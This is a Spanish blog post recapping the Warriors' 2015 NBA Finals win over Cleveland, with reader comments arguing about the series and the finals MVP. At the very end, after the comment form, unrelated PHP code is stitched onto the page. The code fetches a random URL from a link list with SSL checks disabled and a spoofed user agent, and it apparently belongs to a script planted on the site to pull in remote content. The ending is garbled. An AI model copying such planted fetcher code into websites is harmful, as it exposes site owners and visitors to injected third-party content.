La Crónica: Los Golden State Warriors, campeones de la NBA

17 de June de 2015 por txusma

¡Quién le iba a decir a Steve Kerr que ganaría un anillo en su primer año como entrenador! O a Andre Iguodala que sería nombrado MVP de las finales, o a Stephen Curry que ganaría el anillo… y no sería nombrado MVP de las finales. 40 años después, los Warriors vuelven a situarse en lo más alto coronando así una temporada brutal que han dominado de cabo a rabo. Han acabado ganando nada menos que 83 partidos, una marca solo superada por los Bulls de la 1995/1996 y los de la 1996/1997, palabras mayores. Fueron los mejores de la regular y han sido también los mejores de una postemporada que sin embargo no ha acabado de llenarnos del todo.

Tiempo habrá de comentar lo que han sido las finales en su conjunto por lo que nos vamos a ceñir casi exclusivamente al partido de ayer, al teóricamente”must-win” para los Cavaliers y para Lebron James, y digo teóricamente porque no lo pareció durante el primer cuarto. Los locales no salieron muy acertados y los Warriors se fueron de 13 puntos en los primeros minutos. El sexto partido amenazaba con terminar prácticamente antes de empezar pero uno de esos habituales periodos de desconexión que han mostrado los de la bahía durante toda la final permitió a los Cavaliers meterse de nuevo en el partido en incluso llegar a ponerse por delante al principio de la 2ª parte. Es un hecho inexplicable que se ha repetido en muchas ocasiones. Costaba creer que un equipo de 7 jugadores en el que 4 de ellos (Iman Shumpert, JR Smith, Matteew Dellavedova y James Jones) acumulaban en esos momentos un 2 de 14 en tiros de campo pudiera disputar un partido a los todopoderosos (sobre el papel) Warriors. El nivel de Lebron James y el buen trabajo de Tristan Thompson y Timofey Mozgov bajo los tableros era solo una parte de la ecuación. En el otro lado, el horrendo nivel de Klay Thompson y el miedo a ganar que ha demostrado Golden State demasiadas veces. 

Pero las esperanzas de los Cavs duraron lo que duraron las energías de un Lebron James que ya empezó el partido con la luz de reserva encendida. Durante el tercer cuarto el partido fue cayendo del lado visitante por su propio peso con buenos minutos de Festus Ezeli y unos omnipresentes Andre Iguodala (¡ay, si metiera los tiros libres!) y Draymond Green. Enfrente, los Cavs intentaban capear el temporal como podían pero demostraban que ya no estaban para defender a nadie. Ver a James Jones intentando controlar a Iguodala (o a cualquiera) era un dolor para los ojos de cualquier aficionado.

De todas maneras, y en otro episodio de ciencia ficción inexplicable, los Cavs se pusieron a solo 7 puntos a principios del último cuarto aprovechando la alarmante falta de instinto asesino de los Warriors que deberían haber cerrado el partido muchísimo antes. Lebron siguió intentándolo pero falló todo lo inimaginable y algo más mientras Stephen Curry encontraba por fin su toque y con la colaboración de Shaun Livingstone e Iguodala volvía a poner tierra de por medio. Durante el último cuarto se confirmó el triple doble de Draymond Green (primero de la franquicia en un partido de playoffs desde 1969) y a falta de 1:19 y con 11 arriba para los visitantes el partido parecía decidido. En ese momento Dios tocó a JR Smith y el ex de los Knicks enchufó tres triples estratosféricos que acercaron a los suyos a 4 puntos y metieron un poco el miedo en el cuerpo a los jugadores de los Warriors, que no hicieron más que fallar tiros libres una y otra vez. Sin embargo, el que tenía que ser el 4º triple de JR no entró y el partido cayó, por fin, del lado visitante. Lebron James felicitó a Stephen Curry segundos antes de que se acabara oficialmente el choque y su lucha en solitario se dio por concluida.

Minutos después llegaba la sorpresa: el MVP no sería para Curry ni para Lebron, sinó para Andre Iguodala, el 6º hombre de los Warriors. Es justo reconocerle que ha sido absolutamente clave en la consecución del anillo. Ha defendido a Lebron prácticamente en individual durante toda la final y además ha aportado en ataque mucho más de lo que ha venido haciéndolo durante toda la regular. Lo de si eso ha de ser suficiente para imponerse a dos fuera de serie como Lebron (primer jugador de la historia en ser máximo anotador, máximo reboteador y máximo asistente de unas finales, al loro) y Curry ya lo discutiremos mañana, con todo un poco más reposado.

¡Congratulations, Warriors!

Comenta

14 comentarios a esta entrada

  1. Triceratops dice:
    #1

    Los Warriors son los campeones justos de la NBA porque durante todo el año han sido los que más han ganado y mejor jugado.
    Pero la sensación que me llevo es que de haber estado Love y Irving, los Cavs se los habrían ventilado hasta con comodidad diría yo.
    Muy malas finales por parte de GSW y el nombre de Klay Thompson queda tocado tras unas pésimas finales.

      Citar

  2. Jose Luis dice:
    #2

    Yo no lo creo. Con Irving hubiera habido séptimo probablemente, pero creo que Love podía mejorar muy poquito (o incluso ser peor para su equipo) a este Tristan Thompson o a este Mozgov…

      Citar

  3. txusma dice:
    #3

    Jose Luis:
    Yo no lo creo. Con Irving hubiera habido séptimo probablemente, pero creo que Love podía mejorar muy poquito (o incluso ser peor para su equipo) a este Tristan Thompson o a este Mozgov…

    Yo tampoco creo que no hubiera habido final, pero la presencia de Love habría dado muchísimo más descanso a Lebron, a Thompson y al propio Mozgov. Visto como han llegado todos a este sexto partido se me antoja fundamental.
    Eso sí, la clave era Irving, sin duda. Lástima que no lo han tenido sano en ningún momento del playoffs prácticamente.

      Citar

  4. iker dice:
    #4

    Leyendo esto parece que los warriors tenían que haber ganado de 20 y 4-0 la final. A verse nos centramos, antes de la eliminatoria los que decían que warriors ganaba fácil no tenían ni idea de baloncesto y ahora que han ganado mas o menos bien, son unas finales a ver si nos damos cuenta, resulta que tenia que haber ganado 4-0 y por mas de 20 cada partido. en fin, que hay gente que nunca esta contenta. yo soy fan de curry y encantado de la vida estoy, a los que se quejan pues eso, ajo y agua.

      Citar

  5. ramiro dice:
    #5

    A mi me ha dado la impresion que los Warriors han estado muy irregulares en las finales. Esperaba un juego sin tantas oscilaciones . Creia que iban a ganar , pero tambien creia que iban a jugar “mejor”. Cleveland ha jugado como ha podido. , para mi le ha fallado el juego exterior

      Citar

  6. Ruxixón dice:
    #6

    La victoria de los Warriors no tiene ni peros ni asteriscos.Si hubiera sido un equipo que entró en los playoffs de chiripa y luego se hubiera encontrado con lesiones en los equipos rivales todavía,pero habiendo demostrado tal dominio en una competición tan larga donde te enfrentas contra todos varias veces,no le quito ni una pizca de mérito a GS.Si acaso aprovecho para sacar pecho porque Cleveland ha dignificado unas finales que iban destinadas a ser un paseo,a base de un LeBron estratosférico que mereció haber ganado el MVP con unos números que igual tardamos bastantes años en volver a ver,y a una lista de jugadores de perfil medio que han tenido que subir varios escalones para igualar a los Curry,Klay,Iguodala,etc,a base todos ellos de partirse la cara durante minutadas.Eso es lo que hace magnífica la labor de Cleveland,querer igualarse a uno de los mejores equipos de la historia.Para mí fuimos mejores durante los 3 primeros partidos,el 5º fue igualado y los 2 restantes,incluido el último partido de la serie,de claro color azul y amarillo.

    Por último me alegro,ya que el MVP no fue para LeBron,que haya caído en un tío como Iguodala al que se le han caído hondonadas de críticas desde que llegó a la NBA,y que a base de curro ha llegado a esto.

    En fin,se acabó la temporada,guardaremos en el recuerdo la serie Clippers – Spurs como lo mejor de la postemporada.Ya me voy poniendo modo draft que es la semana que viene,si prometeís animación me paso por aquí,yo seguro lo veré “on live”.

      Citar

  7. Ruxixón dice:
    #7

    Se me olvidaba comentar que lo de Adam Silver dando el trofeo ha sido lo más deprimente en años.

      Citar

  8. txusma dice:
    #8

    Si los Warriors hubieran jugado como en la liga regular, barren a los Cavaliers por 20 puntos de diferencia en cada partido. Y no me digas, iker, que no sé de basket. La gente puede tener diferentes opiniones y no por ello hay que minusvalorar la que no son como la tuya.
    Si los Warriors no han barrido no ha sido por Lebron James (que un poco también) sinó porque han pecado de novatos y se han hecho caquita durante muchos partidos de las finales. El de ayer mismo es buena prueba de ello. Podían haber cerrado el partido casi en el 2º cuarto y en cambio se volvieron a cortocircuitar prácticamente ellos solos pq Cleveland no estaba defendiendo un pimiento, no les daban las piernas.

      Citar

  9. Triceratops dice:
    #9

    Ruxixón:

    En fin,se acabó la temporada,guardaremos en el recuerdo la serie Clippers – Spurs como lo mejor de la postemporada.Ya me voy poniendo modo draft que es la semana que viene,si prometeís animación me paso por aquí,yo seguro lo veré “on live”.

    Yo lo veo y comento en directo….y Vader creo que tambien

      Citar

  10. iker dice:
    #10

    txusma:
    Si los Warriors hubieran jugado como en la liga regular, barren a los Cavaliers por 20 puntos de diferencia en cada partido. Y no me digas, iker, que no sé de basket. La gente puede tener diferentes opiniones y no por ello hay que minusvalorar la que no son como la tuya.
    Si los Warriors no han barrido no ha sido por Lebron James (que un poco también) sinó porque han pecado de novatos y se han hecho caquita durante muchos partidos de las finales. El de ayer mismo es buena prueba de ello. Podían haber cerrado el partido casi en el 2º cuarto y en cambio se volvieron a cortocircuitar prácticamente ellos solos pq Cleveland no estaba defendiendo un pimiento, no les daban las piernas.

    yo no he dicho que no sepas de basket, yo digo que antes d las finales en muchos foros a los que decían que warriors ganarían 4-0 fácil se los tachaba fanboys que no tenían ni idea de basket. y ahora que han ganado, bastante fácil, con sustillos pero no daba la sensación en ningún monto que fuera a ganar cleveland ni con 2-1, parece que no vale, que tengan que pedir perdón por ganar.

    que se cagaron en el game 2 y 3, totalmente de acuerdo, que ayer tuvieron algo de miedo a ganar durante tramos del partido, también de acuerdo, pero es normal, eran sus primeras finales para toda la plantilla y eran los favoritos indiscutibles, mucha presión al principio, pero han ganado y bien, jugando buen baloncesto a ratos. en cuanto se quitaron la presión han ganado 3 seguidos.

      Citar

  11. Viva_Dirk dice:
    #11

    Que Love no hubiese mejorado lo que había??? Que hablamos de que Tristan ha dominado el rebote y en eso Love es buenísimo, además habría dotado de anotación interior a los Cavs.

      Citar

  12. Txusma dice:
    #12

    iker: yo no he dicho que no sepas de basket, yo digo que antes d las finales en muchos foros a los que decían que warriors ganarían 4-0 fácil se los tachaba fanboys que no tenían ni idea de basket. y ahora que han ganado, bastante fácil, con sustillos pero no daba la sensación en ningún monto que fuera a ganar cleveland ni con 2-1, parece que no vale, que tengan que pedir perdón por ganar.

    que se cagaron en el game 2 y 3, totalmente de acuerdo, que ayer tuvieron algo de miedo a ganar durante tramos del partido, también de acuerdo, pero es normal, eran sus primeras finales para toda la plantilla y eran los favoritos indiscutibles, mucha presión al principio, pero han ganado y bien, jugando buen baloncesto a ratos. en cuanto se quitaron la presión han ganado 3 seguidos.

    Ok, iker n lo había entendido así, perdona.
    Como dices, en cuanto entró Iguodala y los Warriors se espabilaron un poco ( pq klay y bogut han estado bastante y muy mal, respectivamente) se acabó la eliminatoria. Eso sí, tb contribuyó q los Cavs se quedaron sin gasolina. Por eso digo q con Irving y Love otro gallo hubiera cantado.

      Citar

  13. Vader dice:
    #13

    Triceratops: Yo lo veo y comento en directo….y Vader creo que tambien

    Pues si, por aquí andaré llorando con lo que hagan mis Knicks la noche del draft. Tiene pinta de ser una noche movidita.

    Felicidades a los Warriors!! Justos campeones, grandes campeones!! Equipo histórico el de este año.

    Miedo me dan los Cavs si el año que viene estan todos sanos…

      Citar

  14. Jose Luis dice:
    #14

    Por cierto, tiene que estar contento de que el MVP de las últimas dos finales se lo hayan llevado quienes le han defendido… 😛

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>